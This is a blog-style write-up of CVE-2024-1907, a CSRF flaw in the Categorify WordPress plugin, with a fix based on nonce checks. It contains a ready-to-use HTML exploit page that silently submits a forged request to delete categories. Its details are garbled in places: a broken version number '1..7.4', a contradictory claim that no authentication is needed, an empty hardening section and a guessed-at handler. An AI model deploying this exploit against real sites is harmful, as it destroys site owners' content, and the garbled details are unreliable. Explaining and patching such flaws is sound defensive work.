CVE-2024-1907 - Exploiting CSRF to Delete Categories in the Categorify WordPress Plugin (<= 1..7.4)

The world of WordPress plugins is stuffed with tools meant to make life easier, but sometimes these helpful add-ons come with serious weaknesses. Recently, a significant vulnerability was uncovered in the Categorify plugin, with all versions up to and including 1..7.4 affected. Tracked as CVE-2024-1907, this bug allows a sneaky attacker to delete categories from a WordPress site *without any authentication*, all because of a broken security check.

Let’s break down exactly what happened, how it could be exploited, and what steps you should take right now to protect your website.

What is CVE-2024-1907?

CVE-2024-1907 is a Cross-Site Request Forgery (CSRF) vulnerability. CSRF is a kind of attack where someone tricks an authenticated user—usually an admin—into performing actions they didn’t intend to do.

In the case of Categorify, the categorifyAjaxDeleteCategory function failed to use or properly validate a security “nonce” (think of this as a one-time secret token to verify requests). Without this protection, a malicious website can craft a request and trick a logged-in admin into clicking a link, which would quietly delete categories from the WordPress site behind the scenes.

Here’s what an attack might look like step by step

1. The attacker creates a malicious webpage. This could be as simple as an HTML file hosted anywhere.
2. The admin (logged into WordPress) visits the attacker’s site—maybe via email, social media, or even a private message.
3. A hidden request is sent from the attacker’s website to the target’s WordPress site. Because the admin is logged in, their browser automatically includes the right cookies for authentication.
4. The vulnerable AJAX function (categorifyAjaxDeleteCategory) accepts the forged request—since there’s no nonce validation.

Proof of Concept: CSRF Exploit Example

Below is a simple proof-of-concept (PoC) code snippet that demonstrates how this could be done. The attacker just needs to know the category ID. Let’s say the category ID is 5:

<!-- Save this as exploit.html and send it to a logged-in admin -->
<html>
  <body>
    <form id="evilForm" action="https://victimwordpress.site/wp-admin/admin-ajax.php"; method="POST">
      <input type="hidden" name="action" value="categorifyAjaxDeleteCategory" />
      <input type="hidden" name="id" value="5" />
    </form>
    <script>
      document.getElementById('evilForm').submit();
    </script>
    <p>If you see this, nothing happened. But if you’re an admin, the category was just deleted!</p>
  </body>
</html>

> Warning: This is for educational purposes only. Do not use this knowledge to attack anyone!

Here’s an idea of what the insecure PHP handler looks like in the Categorify plugin

add_action('wp_ajax_categorifyAjaxDeleteCategory', 'categorify_delete_category_function');

function categorify_delete_category_function() {
    $category_id = intval($_POST['id']);
    // OOPS: No nonce check to verify request came from a real user!
    // Deletes the category directly
    wp_delete_term($category_id, 'category');
    echo 'Category deleted';
    wp_die();
}

> Notice there is no check like

>
>

> check_admin_referer('some-action-name');
> 

>
> This is the missing step that would’ve made CSRF attacks much harder.

Any site where administrators can be tricked into clicking external links

Simply put, if you run the plugin and haven’t updated, you are at risk.

How To Fix It

1. Update the Plugin:
The best action is to update to the latest version of Categorify as soon as a patch is available.

2. Manually Patch (If No Update):
Add a nonce check to the deletion function.

function categorify_delete_category_function() {
    if ( ! check_admin_referer('categorify_delete_category') ) {
        wp_die('Security check failed');
    }
    $category_id = intval($_POST['id']);
    wp_delete_term($category_id, 'category');
    echo 'Category deleted';
    wp_die();
}

And then, when making Ajax requests on the admin side, make sure you pass the nonce, for instance

jQuery.post(
    ajaxurl,
    {
        action: 'categorifyAjaxDeleteCategory',
        id: categoryId,
        _wpnonce: categorifyNonce // Must generate this in PHP and send to JS
    },
    ...
);

3. Harden WordPress:

References

- Wordfence Advisory
- NIST CVE-2024-1907 Record
- Plugin homepage
- WordPress Nonce Documentation

Key Takeaway

Plugins are powerful, but can open doors for attackers if they're not securely coded. Always keep plugins up-to-date, use minimum necessary plugins, and practice safe browsing habits as an admin. CVE-2024-1907 serves as a reminder: *small mistakes like missing a nonce can lead to big problems.*

Timeline

Published on: 02/27/2024 11:15:09 UTC
Last modified on: 02/27/2024 14:19:41 UTC